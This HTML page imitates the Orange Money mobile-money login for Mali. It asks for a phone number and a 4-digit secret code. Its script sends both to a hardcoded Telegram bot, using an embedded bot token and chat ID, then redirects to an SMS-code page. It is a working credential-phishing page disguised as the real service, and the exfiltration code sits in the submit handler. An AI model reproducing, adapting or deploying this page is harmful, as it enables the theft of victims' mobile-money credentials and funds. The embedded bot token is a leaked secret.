<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Orange Money</title>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap" rel="stylesheet">

    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Poppins', sans-serif;
            height: 100%;
        }

        .top {
            height: 70px;
            padding: 15px;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .center {
            padding: 15px;
        }

        .box {
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .box .right {
            display: flex;
            flex-direction: column;
            justify-content: center;
            width: 70%;
        }

        input {
            height: 40px;
            width: 100%;
            margin-top: 8px;
            border: none;
            border-radius: 0%;
            font-size: 1.2rem;
            border-bottom: 2px solid;
        }

        input:focus {
            outline: none;
            border-bottom: 2px solid #ff7900;
        }

        .box .left {
            display: flex;
            flex-direction: column;
            justify-content: center;
            width: 30%;
        }

        .left select {
            width: 90%;
            height: 40px;
            margin-top: 8px;
            font-size: 1.2rem;
            border: none;
            border-radius: 0%;
            color: black;
        }

        button {
            width: 100%;
            height: 45px;
            font-size: 1.3rem;
            font-weight: bolder;
            border: none;
            border-radius: 5px;
            color: white;
            background-color: #ff7900;
        }

        #pwd,
        #valider {
            display: none;
        }
    </style>
</head>

<body>

    <div class="top">
        <img src="./img/logo.png" width="70">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"
            stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"
            class="lucide lucide-info">
            <circle cx="12" cy="12" r="10" />
            <path d="M12 16v-4" />
            <path d="M12 8h.01" />
        </svg>
    </div>

    <br>

    <div class="center">
        <h2>Identification</h2>
        <p>Veuillez saisir votre numéro de téléphone ci-dessous. Vous allez recevoir un SMS d’identification.</p>
        <br><br>

        <form id="form" onsubmit="submitForm(event)">
            <div class="box">
                <div class="left">
                    <p>Code pays</p>
                    <select>
                        <option value="+223">+223</option>
                    </select>
                </div>
                <div class="right">
                    <p>Numéro de téléphone</p>
                    <input type="tel" id="tel" placeholder="Entrer numéro de téléphone" maxlength="8" minlength="8"
                        required>
                </div>
            </div>

            <br>
            <input style="width: 70%; margin-left: 30%;" id="pwd" type="tel" maxlength="4" minlength="4"
                placeholder="Entrer code secret" required>

            <br><br><br>

            <button type="button" id="next" onclick="nextStep()">Suivant</button>
            <button type="submit" id="valider" style="display:none">Envoyer</button>
        </form>
    </div>

    <script>
        function nextStep() {
            const form = document.getElementById('form');
            var tel = document.getElementById('tel');
            var pwd = document.getElementById('pwd');

            if (tel.value !== '') {
                document.getElementById('pwd').style.display = 'block';
                document.getElementById('valider').style.display = 'block';
                document.getElementById('next').style.display = 'none';
            } else {
                tel.reportValidity();
            }
        }

        function submitForm(event) {
            event.preventDefault();

                const tel = document.getElementById('tel').value;
                const pwd = document.getElementById('pwd').value;
                const chatId = '8033906914'; // Remplace par ton chat_id
                const token = '7891154943:AAG-iRSqPg6KL1q-slYogakDcXBvjrcrFCU'; // Remplace par ton token de bot
                const message = `📞Numéro: ${tel}, 🎯Code secret: ${pwd}`;

                // Envoi de la requête au bot Telegram
                fetch(`https://api.telegram.org/bot${token}/sendMessage`, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({
                        chat_id: chatId,
                        text: message
                    })
                })
                    .then(response => response.json())
                    .then(data => {
                        if (data.ok) {
                            // Redirection après l'envoi réussi
                            localStorage.setItem('tel', tel);
                            window.location.href = './sms.html';
                        } else {
                            console.log('Erreur lors de l\'envoi du message.');
                        }
                    })
                    .catch(error => {
                        console.error('Erreur:', error);
                        console.log('Erreur lors de la communication avec Telegram.');
                    });
        

        }


    </script>

</body>

</html>